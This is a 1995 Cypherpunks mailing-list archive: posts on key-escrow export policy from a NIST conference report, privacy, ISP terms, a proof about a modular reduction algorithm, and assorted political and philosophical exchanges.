STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY! From frissell at panix.com Thu Sep 7 02:49:55 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 7 Sep 95 02:49:55 PDT Subject: Collection of personal info In-Reply-To: <199509062144.RAA05718@cushing.bwh.harvard.edu> Message-ID: On Wed, 6 Sep 1995, Adam Shostack wrote: > No. But the interesting question is, what to do about it? > The answer in part, is personal anonymity through cash and avoiding US > IDs. But in the long run, thats broken. You can't have privacy for > 1000 people; they'll just toss us all in jail. I doubt if TRW will throw you in jail for avoiding their database. Last time I looked, it wasn't (very) illegal to avoid US IDs. DCF From frissell at panix.com Thu Sep 7 03:05:41 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 7 Sep 95 03:05:41 PDT Subject: cryptography eliminates lawyers? In-Reply-To: <199509062335.SAA02364@sam.neosoft.com> Message-ID: On Wed, 6 Sep 1995, Buford Terrell wrote: > How could crypto put lawyers out of business? People would still > have disagreements; plans would still go wrong; cars would still > crash. More important, transactions would still need to be > structured to carry out the desires of the parties while minimizing > risks. > > Good communications technology, including crypto, could make lawyering > more efficient, but I suspect the savings would be minimal. Well, if crypto reduces the role of government in human affairs, it will reduce work for lawyers. Telecoms will certainly break the professional monopoly of lawyers (and other professionals). DCF From futplex at pseudonym.com Thu Sep 7 03:27:43 1995 From: futplex at pseudonym.com (Futplex) Date: Thu, 7 Sep 95 03:27:43 PDT Subject: not a flame please read and think about this In-Reply-To: <9509070626.AA07408@anon.penet.fi> Message-ID: <9509071027.AA15077@cs.umass.edu> I feel it's my civic duty to respond to these things, but there's nothing new here. NOISE. an116512 at anon.penet.fi writes: > why is it that half the > people who post here work for the government or big companies that are doing > governments bidding *sigh* This line gets trotted out every few months here, like clockwork. You should look for similar threads in the archives. Allow me to sum them up for you, meanwhile: who cares ? Perhaps it's because the government and big corporations have (surprise) flocks of people working for them. Your assertion that fully 50% of the posters to the list overtly work for such organizations is patently absurd, anyway. [...] > what makes me wonder isnt so much that theyre here but that they post > socalled reasonable stuff that supports the the government line. > like when these people report on what the nsa guy says at the crypto > convention as if were supposed to take it seriously What alternative do you propose ? Are we merely to chuckle and say, "Oh, those guys at the NSA are such kidders. As if they actually had any influence on public policy decisions in the U.S. What a hoot !" ? > and these people who say clipper is good enough no back doors. > and then everyone takes this crap seriously. Eh ? David Sternlight isn't openly on the list; whom do you have in mind ? > obviously the government thinks there are some things we shouldnt think > about ourselves. (Agreed) > and then someone comes along and says theyve thought about > it already and we should just go mind our own biz. arent we supposed to be > cypherPUNKS? than why do we need these people to think for us? Unless you can be more specific about this, I really have no idea to what and whom it refers. > honest replies only please. i dont mean to flame but this really bothers me. BTW, if not for this line I wouldn't even have bothered replying. > we should maybe think about a closed list. Feel free -- no-one is stopping you or anyone else from creating one. You could even announce it here. I'll still be here listening to Matt Blaze, Jim Gillogly, Derek Atkins, Jeff Weinstein, et al. But then again I've worked at a govt. lab too, so I guess I wouldn't be welcome on your list either. Darn. -Futplex From pfarrell at netcom.com Thu Sep 7 04:26:42 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Thu, 7 Sep 95 04:26:42 PDT Subject: Notes from NIS&T Key Escrow Export conference. Message-ID: <26714.pfarrell@netcom.com> -----BEGIN PGP SIGNED MESSAGE----- Here are my noted and remembered impressions from Wedensday's NIS&T conference on key escrow (aka GAK) export. Please note that there is a separate conference next week on creating a FIPS PUB standard for key escrow. That standard will be promulgated, just as GOSIP, POSIX and Clipper/Skipjack were promulgated. This export conference was separate from that FIPS standardization process. I got stuck in a construction traffic jam, and missed the introductory speaches. Perhaps one of the other c'punks can fill us all in on what I missed. The first item is that the export criteria will be changed. A small number of bits will be added to unescrowed crypto, and 64-bit escrow'd (GAK'd) systems will be allowed. They don't care which algorithm is used, DES, RC4, blowfish, etc. They care about key length. If it is short enough, it is exportable. The conference seemed to be an attempt to co-opt industry into agreeing that 64-bit GAK is much better than the current situation. After all, it would be too strong for a "hacker in France" to break it. When they opened the floor, there were a few comments/questions that indicated that not everyone was convinced that this was a good thing. I pointed out some graduate students don't consider "hacker" a compliment, and that I thought Damian did a great job breaking RC4-40. I also pointed out that it was broken again in 31 hours with a "bunch of commercial systems, Sun and Pentiums" with no need for suaercomputers. I then asked if the criteria were fixed, as setting criteria controls the result. The NIS&T approved board said that changes to the criteria was part of why the conference was being held. The next hour and a half was presentation from "industry." Essentially comments on the proposal. Nearly all of the spokesmen said that the criteria were flawed. Some said that they already had commercial products that met most of the real needs of the industry (key recovery) but they didn't meet the NIS&T/NSA "criteria." Probably the strongest was the condamnation by Robert Holleyman of the Business Software Alliance. Hollyman said that BSA represents firms such as Microsoft, Novell, Lotus, Sybase, SCO, Autodesk, and Intergraph. He said that current policy "directly threatens" the industry because of "The US Government's continuing refusal to adopt realistic export control policies." He went on and on. It was clear that his position is that the proposed policy is a mistake. After the presentations, there were more questions. I proposed one additional criteria (based on email that I received from the c'punks): How do we expire court approved access to encrypted data, so that once the court orders are over, the LEAs no longer have the ability to decrypt. The answer was that with clipper, special hardware is needed, and it goes away when the court order does. I asked how that model worked in a software only world. There were mumbled statements about adding it as a criteria. The conference then broke for lunch and breakout groups. The one I was in discussed criterias 5 and 6 of Topic 3, published in my URL http://www.isse.gmu.edu/~pfarrell/nistmeeting.html They are short enought to reproduce here. 5. The product shall be resistant to any alteration that would disable or circumvent the key escrow mechanism, to include being designed so that the key escrow mechanism cannot be disabled by a static patch, (i.e., the replacement of a block of code by a modified block). 6. The product shall not decrypt messages or files encrypted by non-escrowed products, including products whose key escrow mechanisms have been altered or disabled. After I commented that the person writing the notes has the ability to detirmine what was said, the folks from NSA and NIS&T asked me to take the notes. I love it; but I did try to be objective. In the middle of this discussion, a government-generated, but anonymnous paper was distributed. It had "Example Suggested Solutions." It suggeeted that source code not be available for products suitable for export. It also suggested other ideas, such as storing a checksum/hash and having the system "check the cryptographic code several times during its use." There was a strong reaction against these suggestions, not because they were bad ideas, but because the paper was delivered with no prior publication. This precluded any planned response to its ideas. We reworded #5 to say "want to Trust the Product." This means that it is untampered, works as expected, etc. We then hashed out ways to know this. The list ended up looking like: 1. is available only as object code 2. contains some "hash" function to check for modifications 3. contains some unique hash, with uniqueness based upon something like "site," "per copy" or "per release" 4. Contains policies against modification, such as liscense language against decompilation. 5. OS-related security, such as runs "protected mode" instead of as a wild DOS program. Of course, the software vendors went wild against "per copy" identifiers, saying it would add two orders of magnitude worth of problems to manufacturing. The items on the list were not "must have all of these" rather it was a pick-and-chose menu. We also required that the standard allow for technical innovation to keep up with the evolving state of the art. The discussion of #6 was more lively. We took a long time figuring out what it said. For instance, could ViaCrypt sell a product that was compatible with PGP 2.6.2 (non-escrowed) that also worked with the new escrowed ciphers? It seems to me, and a lot of other folks there, that such a product would be non-exportable. We simplified the criteria to: "right products won't talk to wrong products." with "right products" meaning those that are exportable, and wrong products being those that aren't, or are hacked, or ... We then developed "goals" including: 1. One version for sale worldwide 2. Allow development in the US 3. Domestic Law Enforcement Agencies want Escrowed (I almost wrote GAK :-) 4. Must interoperate with everything 5. Receiver can only decrypt if escrow agencies can decrypt. This leads to a bunch of issues and observations, including: a. Can goals 1, 2, and 4 be met simultaneously? There was a suggestion of a "friendly man-in-the-middle" who would receive a GAK'd conversation, and strip off the GAK parts, and reencrypt it, and retransmit it to a non-GAK user. Which leads to: b. Can we prohibit a friendly MITM? The big issue was: c. Startup compatibility. No one will buy products unless they have sales attractiveness. This means compatibility with existing systems. Yet the criteria #6 seems to say that approved products must refuse backwards compatibility. This was labeled a "non starter" by the group. The consensus was that companies can develop a substantial competitive advantage by developing off-shore and offering both escrowed encryption and compatibility with existing systems. There was a discussion of grandfathering in some technologies. This was to help interoperability. The conversation became fuzzy, Grandfather technologies included DES, 3-DES, IDEA, and long key RC4. One key idea was that it may make sense to allow software that encrypts with escrowed keys, but can also decrypt with any algorithm. This allows the LEA's to access outgoing messages, while allowing interoperability. The discussions frequently wandered to discuss the language of the criteria. The wording was considered simultaneously too subjective and impractical. For example, we considered the phrase "tamper resistant" to be preferable to the original "prevent tampering," because it is impossible to absolutly prevent modification to software. The issue of interoperability was raised repeatedly. It is critical that exportable products interoperate with other, existing export products. The last issue in the session was that the length of the key, 64-bits, was defined in criteria #1. There was no discussion at the conference on this criteria. It seems that the NIS&T and NSA folks believe that this is a closed topic. The folks in the session did not agree. They felt that 64-bits was not enough. Once the breakout session was over, the entire conference met together, and the "reporter" from each session reported their comments and findings. All breakout sessions had suggested changes. The group that discussed criteria #9 recommended removing it. The group that discussed criteria #2 (no multiple encryption) reported that industry was working on a general solution to the problem of key recovery, and that their solution would probably appear as quickly without the government's "help." Several groups identified that there are at least two separate problem domains: communications and data storage. Communications typically is short term, and has unique keys for each session. Data storage has far fewer keys that are used for long periods. Several speakers suggested that while communications keys were not suited to be escrowed, there was a large need for key recovery for data storage. There was no response from the government representatives to any of these points. One government speaker did say that there would be a Federal key escrow standard, period. After the combined session, there were more break-out sessions. In the one that I attended, the folks from National Semiconductor described their CAKE system. This is a smartcard/PCMCIA device that uses 2000+ bit public/private key encryption and signatures. They are hoping for export approval; it is necessary for the project to be viable. The system looks pretty interesting, but it too complicated to describe here. In short, random session keys are generated and signed with a Data Recovery Center's public key. The LEAs could then send encrypted session keys to the DRC, which would decrypt them, and return the unencrypted session keys which the LEA could then used to decrypt the messages. While this is a hardware system, its concepts could be transfered to a software implementation. One obvious problem is that NS' system doesn't meet criteria #8 (retuiring repeated involvement of the escrow agent), since it may require hundreds or thousands of session key decipherments. It also has a number of attractive features, such as never sending the private key anywhere, only the session key is escrowed. The general discussion showed concerns that in the international community, requiring government escrow may cause lose of valuable data, as some foriegn governments are not as trustworthy as the US. It was the consensus that requiring users to have 50 or more escrow centers was unworkable. Yet this could be required for large multinational companies working in 50 or more countries, if each required a local key escrow service. The NS model would allow both date stamping of session keys, and periodic rekeying. Either would satisfy my "unaccepted" Citeria #11, technical limits to the time that a court ordered decryption could be executed. There was a discussion of changing the criteria so that only the transmission of data was concerned with escrow. This would simplify the issue of multinational escrow. We did not resolve whether this would be sufficient or acceptable. Today, we will talk about suitable escrow agencies. Pat -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBME7WOLCsmOInW9opAQHbawP+PSC+9p7ll7yKTiwnkzrIf+aT/ZfuoCqj Fp6ZhykIoJQVF5YAEhz9O1t9FKOauo3baMDhaIvU4pUSm2b/hKlUFB8cwYr7KTjd MFGxTOG/D7blGuX6ZXbHlS5EkKeT1pDtfrd9GlnTKWHxfga/51ROWCG/33BWZxHR lyNLI07UPbo= =kFkC -----END PGP SIGNATURE----- Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From stripes at va.pubnix.com Thu Sep 7 05:58:29 1995 From: stripes at va.pubnix.com (Josh M. Osborne) Date: Thu, 7 Sep 95 05:58:29 PDT Subject: ECPA (Was: University logging mail to anon.penet.fi) In-Reply-To: <199509070542.BAA23214@libws4.ic.sunysb.edu> Message-ID: In message <199509070542.BAA23214 at libws4.ic.sunysb.edu>, Deranged Mutant writes [...] >I've heard some nasty stories about boards and a couple of I-Net providers >who charge for access but reserve the right to throw someone off the system >without refund (it's often in the terms of many account applications) for >various no-nos. Alot do more or less that, but if you were an Internet Service Provider how would you deal with it? For example what if a customer started sending obscene material to people who didn't want it, and the recipents started to complain to you, or the goverment? If you (the ISP) don't have a service agreement that says you can disconnect the customer in that case you are in danger of getting sued by them if you cut them off. If you don't cut them off you are in danger of getting sued or shut down by the goverment. Even if we were in a more libertarian society you run the risk of being boycotted by potential customers (of corse the analagy breaks down somewhat, in a very libertarian society oyu might be able to run a profatable ISP selling to the very nich market of people who want to threten, harass, or generally make a nuicence of themselves). As a result are unlikely to find an ISP that doesn't have a set of no-no's. (and if you do they may not be in bisness for long) The best I think you can do is find an ISP that publishes their list of no-no's (like the one I work for UUNET - see any file in ftp://ftp.uu.net/uunet-info with "svc" in it's name and skip down to "AlterNet Terms and Conditions"), and seems to have a reasonable set of them, and last but not least make sure that they do at least refund any payment for service not recieved. For example UUNET (which I work for - but this is mostly irrelivant as this is a statment of the facts, not an oponion) publishes their terms and conditions in ftp://ftp.uu.net/uunet-info (look at any file with "svc" in it's name and skip down to "AlterNet Terms and Conditions"). As for reasonability I'll leave that up to you to decide. -- And no, I'm not speaking for UUNET Technologies, or anyone but myself. From stripes at va.pubnix.com Thu Sep 7 06:16:30 1995 From: stripes at va.pubnix.com (Josh M. Osborne) Date: Thu, 7 Sep 95 06:16:30 PDT Subject: Are booby-trapped computers legal? In-Reply-To: <9509061938.AA02249@zorch.w3.org> Message-ID: In message <9509061938.AA02249 at zorch.w3.org>, hallam at w3.org writes: [...] >People who go round drawing parallels to gun ownership and cryptography >ownership are simply playing into the governments hands. That could well be. (that's a crypto relivant as this message gets - sorry) > Cryptography has net >benefits to society. Most advocates of gun ownership tend to convince me of >little more than they are a danger to society. Regardless of their case they a >re >the biggest argument for gun control, and therfore poor advocates of their >cause. [...] I'm sorry to see you say that, but rather then argue here I'll provide a pointer to a fine set of arguments "A Nation of Cowards" by Jeffrey R. Snyder (the "nation" it refers to is the USA, not the UK). Available via the web , enjoy or not. From derek at hagling.demon.co.uk Thu Sep 7 06:52:32 1995 From: derek at hagling.demon.co.uk (Derek Roth-Biester) Date: Thu, 7 Sep 95 06:52:32 PDT Subject: Cybersecurity Message-ID: <199509071329.JAA06512@panix.com> > >> "Cybersecurity" - an investigation into cryptography, the > >> Internet, civil rights, Phil Zimmermann, PGP (and should we be > >> permitted to use it?) and so forth. > >> [My wife] and I watched this program - she found it very informative - otherwise for me it wasn't anything new, other than to see Whitfield Diffie, Phil Zimmermann and some porn star Cyberella being interviewed about public/private key encryption. It was very much on the side of those seeking privacy, presenting the government (even in the UK they are looking at mandatory key escrow, but they haven't exactly told British subjects about it) as being underhand, sneaking around to find ways of removing the privacy of the individual. What they didn't say is that the debate is a moot point. The technology is out there and there ain't nothin' the guvmint can do about it. Derek From jamesd at echeque.com Thu Sep 7 06:57:16 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 7 Sep 95 06:57:16 PDT Subject: What is truth? Message-ID: <199509071356.GAA01805@blob.best.net> Crypto relevance: Absolutely none: At 10:57 PM 9/6/95 -0700, Timothy C. May wrote: > If you want more information on my views about truth, check out > the work on "evolutionary epistemology," especially the writings > of William Bartley and Karl Popper. Popper went off the deep end because he tried to justify science without relying on the principle of induction, or its equivalent, Bayesian probability. A hopeless endeavor, like the attempt of the behaviorists to describe behavior without reference to intention, desire, and knowledge. His reasoning leads logically to the polylogism of the fascists, an outcome he imagines he avoided, but in fact he merely rephrased in language that superficially sounds more favorable to science. Bayesian probability leads us to the conclusion that some scientific theories have a probability of truth that is exponentially close to unity. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jim at acm.org Thu Sep 7 07:06:42 1995 From: jim at acm.org (Jim Gillogly) Date: Thu, 7 Sep 95 07:06:42 PDT Subject: not a flame please read and think about this In-Reply-To: <9509070626.AA07408@anon.penet.fi> Message-ID: <199509071406.HAA07763@mycroft.rand.org> > an116512 at anon.penet.fi writes: > like when these people report on > what the nsa guy says at the crypto convention as if were supposed to take it ... > honest replies only please. i dont mean to flame but this really bothers me. >we should maybe think about a closed list. Time to mark my calendar -- flamed on the same day by David Sternlight in alt.security.pgp for espousing cypherpunk ideals and by an anonymous person on C'punks for being a government stooge. I must be doing something right. 16 Halimath -- red letter day. Jim Gillogly Highday, 16 Halimath S.R. 1995, 14:05 From jamesd at echeque.com Thu Sep 7 07:36:21 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 7 Sep 95 07:36:21 PDT Subject: Growth of actions definded as crime. Which math formula? Message-ID: <199509071435.HAA04352@blob.best.net> At 12:29 PM 9/6/95 -0700, Timothy C. May wrote: > I've seen figures on the "linear feet" of regulations, and how they are > growing exponentially, but I don't recall the numbers. Something like the > total number of laws doubling every 10 years or so, but don't quote me on > this one. In addition one should also consider that most of these new crimes are deliberately written to be sweeping and vague so that they can be enforced in a selective and capricious manner: For example wetlands are deliberately defined in a way to give them considerable elbow room, indeed so much elbow room that much of death valley technically qualifies as wetlands. The wetlands law was written to make it easy for bureaucrats to win lawsuits, not to reflect common sense or basic sanity. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From bianco at itribe.net Thu Sep 7 07:46:24 1995 From: bianco at itribe.net (David J. Bianco) Date: Thu, 7 Sep 95 07:46:24 PDT Subject: Cryptography Technical Report Server (CTRS) needs submissions! Message-ID: <199509071442.KAA03274@gatekeeper.itribe.net> Earlier this week I posted a note bemoaning the lack of a good searchable repository for cryptography related technical reports. In short, I volunteered to develop, host and maintain such a system as a service to the rest of the Internet. The system is ready, now the fun part begins... The Cryptographic Technical Report Service needs *YOU*. Specifically, it needs your technical reports (or other technical documentation). In order for CTRS to become popular, it needs to have a useful amount of data to search, so I'm currently soliciting submissions for the database. Contributing to CTRS is pretty simple. Detailed information can be found at , but basically all that's required is to send a refer-format bibliographic entry which contains a URL pointing to the paper's real Net location. I'll index the entries (prettyprinting them, of course), and CTRS users will follow that URL if they want to retrieve the paper. If you don't have a URL, I'm willing to host as many papers as I have resources for. Full details can be found at the URL above, but please note that I'm only able to accept papers submitted by the authors (or copyright holder). If you'd like to know more about CTRS, you can check out it's beta version at ( for the SSL version). The database doesn't have much (anything) in it right now, so I'm relying totally on submissions in order to build the collection. I firmly believe that CTRS can provide a useful service to the cryptographic community, so I hope you will all consider contributing your reports to CTRS. If you have questions, please check out the CTRS FAQ . If you still have questions, feel free to contact me at the email address below. ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From danisch at ira.uka.de Thu Sep 7 08:00:41 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Thu, 7 Sep 95 08:00:41 PDT Subject: fast modular reduction (proof?) Message-ID: <9509071459.AA01801@elysion.iaks.ira.uka.de> > In the following pseudocode, B is the radix in which the numbers are > represented (2^32 for a 32-bit machine), n is the length of modulus in > blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 > is the length of X, and Y is the result. > > 1. Y = X > 2. For i from k down to n+1, repeat steps 3 and 4 > 3. Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1) > 4. If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1) To do a proof I rewrite the algorithm: n = len(modulus) // modulus < B^n Y = X // obviously Y = X mod modulus K = B ^ (n+1) - U // U = B ^ (n+1) mod modulus, // therefore K = 0 mod modulus // furthermore K > 0 for (i=len(Y)-1 ; i>n ; i--) { F = B ^ (i-n-1) * K // F > 0 // F = 0 mod modulus Y -= Y[i] * F // Y shrinking, but // Y still the same mod modulus if ( Y >= B^i ) Y -= F // again shrinking, // still the same mod modulus } This shows that Y was shrinking, but is still equal to X mod modulus. To see whether Y really shrinks enough: Y = sum(i=0..len(Y)-1) Y[i] * B^i In the step Y = Y - Y[i] * B^i the highest block of Y is deleted (what could be done fast by reducing the length of Y). Now Y < B^i Afterwards the same value mod modulus is added to keep Y constant: Y = Y + Y[i] * U * B^(i-n-1). Y[i] Y[i]+1 <= B U < modulus < B^n , therefore U < B^n -> (Y[i]+1) * U < B * B^n = B^(n+1) -> Y[i] * U < B^(n+1) - U -> Y[i] * U * B^ (i-n-1 ) < F Therefore after doing the addition Y < B^i + F Check of the last step: 0 <= U < B^n therefore B^n < B^(n+1) - U <= B^(n+1) Therefore in every loop B^(i-1) < F <= B^i -> Y-F < B^i Partial Correctness: Y = X [ Y = X mod Y < B^len(X) ] K = B ^ (n+1) - U [ K = 0 mod B^n < K <= B^(n+1) ] for (i=len(X)-1 ; i>n ; i--) { [ Y = X mod , Y < B^(i+1) ] F = B ^ (i-n-1) * K [ F = 0 mod , B^(i-1) < F <= B^i ] [ 0 <= Y[i] < B ] [ Y[i] * F = 0 mod , 0 <= Y[i] * F < B^(i+1) ] [ Y >= Y[i] * B^i -> Y >= Y[i] * F ] Y -= Y[i] * F [ Y = X mod , Y < B^i + F (reason see above) , Y >= 0 ] if ( Y >= B^i ) Y -= F // again shrinking, // still the same mod modulus [ Y = X mod , Y >= 0 , Y < B^i ] } Last i was n+1, therefore Y = X mod , Y >= 0 , Y < B^(n+1) This is not enough, Y < B^n is requested. The loop can't be done once more because i-n-1 would become negative. k+1 was the length of X, and n the length of the modulus. You walk down from k to n+1 . In every loop you remove one block of the number. This means you have to do len(X)-len(modulus) loops. In the pseudocode you do only len(X)-len(modulus)-1 loops. One loop seems to be missing. This may be a result of confusion whether your Y starts with Y[0] or Y[1]. I do understand the algorithm as: n = len(modulus) U = B^n mod modulus K = B^n - U // = 0 mod modulus, 0 < K < B^n Y = X for(i=len(X)-1 ; i>= n ; i--) // squeeze Block i in Number Y { // Y < B ^ (i+1) F = B ^ ( i-n ) * K // F = 0 mod modulus Y -= Y[i] * F // subtract Y[i] * B^i, now Y < B ^ i // add the equivalent Y[i] * B^(i-n)*U <= F // now Y < B^i + F if ( Y >= B[i] ) Y -= F // now Y < B^i } Last i was n, therefore Y < B^n , Y = X mod modulus , but perhaps still Y >= modulus. Ok, algorithm understood and agreed (after modifying the loop counter). Any more agreement or disagreements? Hadmut From sandfort at crl.com Thu Sep 7 08:09:54 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 7 Sep 95 08:09:54 PDT Subject: not a flame please read and think about this In-Reply-To: <9509070626.AA07408@anon.penet.fi> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Thu, 7 Sep 1995 an116512 at anon.penet.fi wrote: > why is it that half the > people who post here work for the government or big companies that are doing > governments bidding (rand.org (which is part of the the nsa!) att.com (makers of the clipper chip) > mit (which onwns rsa) > netscape etc etc) I doubt the statistics and I don't see how mere employment with the above somehow disqualifies one for having a regard for privacy. In many cases, they have a much better grasp of the threat than the rest of us. > what makes me wonder isnt so much that theyre here but that they post socalled > reasonable stuff that supports the the government line. This is nonsense. Please give some examples of the sycophantic posts you claim supports "the government line." > like when these people report on > what the nsa guy says at the crypto convention as if were supposed to take it > seriously and these people who say clipper is good enough no back doors. > and then everyone takes this crap seriously. Who? When? To which "everyone" do you refer? > . . . arent we supposed to be > cypherPUNKS? What the hell is that supposed to mean? The name was given and accepted in jest. I'm not aware of any special PUNK qualifications. Please elucidate. > than why do we need these people to think for us? The Cypherpunks I know certainly don't; sorry to hear about you. Are you planning to show up at Saturday's anniversary meeting again, Larry? S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From patrick at Verity.COM Thu Sep 7 08:11:36 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Thu, 7 Sep 95 08:11:36 PDT Subject: Scientology and police visit XS4ALL Amsterdam Message-ID: <9509071507.AA08037@cantina.verity.com> > My personal view is co$ deserves all the flak they get. I know who you're referring to by saying co$, but what do co$ mean? Co-DollarSign? Co-Dollar? Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/ From jamesd at echeque.com Thu Sep 7 08:22:03 1995 From: jamesd at echeque.com (James A. Donald) Date: Thu, 7 Sep 95 08:22:03 PDT Subject: cryptography eliminates lawyers? Message-ID: <199509071521.IAA07990@blob.best.net> At 06:05 AM 9/7/95 -0400, Duncan Frissell wrote: > Well, if crypto reduces the role of government in human affairs, it will > reduce work for lawyers. Telecoms will certainly break the professional > monopoly of lawyers (and other professionals). The functional equivalent of lawyers will still have a role. When an escrow agent allocates large chunks of money in some fashion, and somebody says X was bad, and X says that Y was bad, and the reputations are worth real money, we will need a public examination to determine what really happened. And if governments collapse entirely, and we get full bore anarchy, lawyers will have even more work because instead of a few reputations being worth large sums of cash, everyones reputation will be worth life and limb. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From trei at process.com Thu Sep 7 08:23:13 1995 From: trei at process.com (Peter Trei) Date: Thu, 7 Sep 95 08:23:13 PDT Subject: Notes from NIS&T Key Escrow Export conference. Message-ID: <9509071523.AA12261@toad.com> >The last issue in the session was that the length of the key, 64-bits, >was defined in criteria #1. There was no discussion at the conference on >this criteria. It seems that the NIS&T and NSA folks believe that this is a >closed topic. The folks in the session did not agree. They felt that 64-bits >was not enough. I hope this gets to you before the conference is over. I would REALLY like to hear the government response to the question: "If keys are escrowed, what purpose does a 64 bit limit serve?" Secondarily, I observe that this apparently precludes the use of OTP. Peter Trei ptrei at acm.org From danisch at ira.uka.de Thu Sep 7 08:32:59 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Thu, 7 Sep 95 08:32:59 PDT Subject: fast modular reduction (proof?) Message-ID: <9509071531.AA01869@elysion.iaks.ira.uka.de> -----BEGIN PGP SIGNED MESSAGE----- > In the following pseudocode, B is the radix in which the numbers are > represented (2^32 for a 32-bit machine), n is the length of modulus in > blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 > is the length of X, and Y is the result. > > 1. Y = X > 2. For i from k down to n+1, repeat steps 3 and 4 > 3. Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1) > 4. If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1) To do a proof I rewrite the algorithm: n = len(modulus) // modulus < B^n Y = X // obviously Y = X mod modulus K = B ^ (n+1) - U // U = B ^ (n+1) mod modulus, // therefore K = 0 mod modulus // furthermore K > 0 for (i=len(Y)-1 ; i>n ; i--) { F = B ^ (i-n-1) * K // F > 0 // F = 0 mod modulus Y -= Y[i] * F // Y shrinking, but // Y still the same mod modulus if ( Y >= B^i ) Y -= F // again shrinking, // still the same mod modulus } This shows that Y was shrinking, but is still equal to X mod modulus. To see whether Y really shrinks enough: Y = sum(i=0..len(Y)-1) Y[i] * B^i In the step Y = Y - Y[i] * B^i the highest block of Y is deleted (what could be done fast by reducing the length of Y). Now Y < B^i Afterwards the same value mod modulus is added to keep Y constant: Y = Y + Y[i] * U * B^(i-n-1). Y[i] Y[i]+1 <= B U < modulus < B^n , therefore U < B^n -> (Y[i]+1) * U < B * B^n = B^(n+1) -> Y[i] * U < B^(n+1) - U -> Y[i] * U * B^ (i-n-1 ) < F Therefore after doing the addition Y < B^i + F Check of the last step: 0 <= U < B^n therefore B^n < B^(n+1) - U <= B^(n+1) Therefore in every loop B^(i-1) < F <= B^i -> Y-F < B^i Partial Correctness: Y = X [ Y = X mod Y < B^len(X) ] K = B ^ (n+1) - U [ K = 0 mod B^n < K <= B^(n+1) ] for (i=len(X)-1 ; i>n ; i--) { [ Y = X mod , Y < B^(i+1) ] F = B ^ (i-n-1) * K [ F = 0 mod , B^(i-1) < F <= B^i ] [ 0 <= Y[i] < B ] [ Y[i] * F = 0 mod , 0 <= Y[i] * F < B^(i+1) ] [ Y >= Y[i] * B^i -> Y >= Y[i] * F ] Y -= Y[i] * F [ Y = X mod , Y < B^i + F (reason see above) , Y >= 0 ] if ( Y >= B^i ) Y -= F // again shrinking, // still the same mod modulus [ Y = X mod , Y >= 0 , Y < B^i ] } Last i was n+1, therefore Y = X mod , Y >= 0 , Y < B^(n+1) This is not enough, Y < B^n is requested. The loop can't be done once more because i-n-1 would become negative. k+1 was the length of X, and n the length of the modulus. You walk down from k to n+1 . In every loop you remove one block of the number. This means you have to do len(X)-len(modulus) loops. In the pseudocode you do only len(X)-len(modulus)-1 loops. One loop seems to be missing. This may be a result of confusion whether your Y starts with Y[0] or Y[1]. I do understand the algorithm as: n = len(modulus) U = B^n mod modulus K = B^n - U // = 0 mod modulus, 0 < K < B^n Y = X for(i=len(X)-1 ; i>= n ; i--) // squeeze Block i in Number Y { // Y < B ^ (i+1) F = B ^ ( i-n ) * K // F = 0 mod modulus Y -= Y[i] * F // subtract Y[i] * B^i, now Y < B ^ i // add the equivalent Y[i] * B^(i-n)*U <= F // now Y < B^i + F if ( Y >= B[i] ) Y -= F // now Y < B^i } Last i was n, therefore Y < B^n , Y = X mod modulus , but perhaps still Y >= modulus. Ok, algorithm understood and agreed (after modifying the loop counter). Any more agreements or disagreements? Hadmut -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBME8QImc1jG5vDiNxAQFREgQAiMWfgy3bZtPckCNToAvKP7A+JevlnrqG wJT6/111656nAZHDF5Htr2vwPEmiR522IvPKMG2MnOanMIRn2bgBYG3GECA3zlDo ZnXNT1OXdtZzv848WPryLVjSJrrVTX/PUN9d6LaTqLBP5pZXwAYkO5kLU6/WP6yL tF+fniXDZvk= =Ev0S -----END PGP SIGNATURE----- From frissell at panix.com Thu Sep 7 08:34:01 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 7 Sep 95 08:34:01 PDT Subject: Force Ratios Message-ID: <199509071447.KAA28579@panix.com> Wednesday night's ABC magazine program on Ruby Ridge was a great example of what TV can be but so 